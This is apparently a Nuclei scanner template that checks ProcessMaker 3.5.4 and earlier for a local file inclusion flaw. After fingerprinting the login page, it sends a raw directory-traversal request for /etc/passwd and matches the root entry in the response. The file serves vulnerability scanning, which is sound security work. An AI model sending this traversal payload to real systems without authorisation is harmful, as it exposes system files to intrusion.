49 lines
1.1 KiB
YAML
49 lines
1.1 KiB
YAML
id: processmaker-lfi
|
|
|
|
info:
|
|
name: ProcessMaker <=3.5.4 - Local File Inclusion
|
|
author: KrE80r
|
|
severity: high
|
|
description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50229
|
|
- https://www.processmaker.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 2
|
|
tags: processmaker,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "ProcessMaker"
|
|
- "processmaker_login.png"
|
|
condition: and
|
|
|
|
- raw:
|
|
- |
|
|
GET /../../../..//etc/passwd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100a2d53fd04e4886853601927d39114d639b9f79e185e59a9706dbb6d90b5b8351022020c2ee40c3ff736efbb7f6dd6b45a00fbfe527bd93728515112625e76390afa2:922c64590222798bb761d5b6d8e72950 |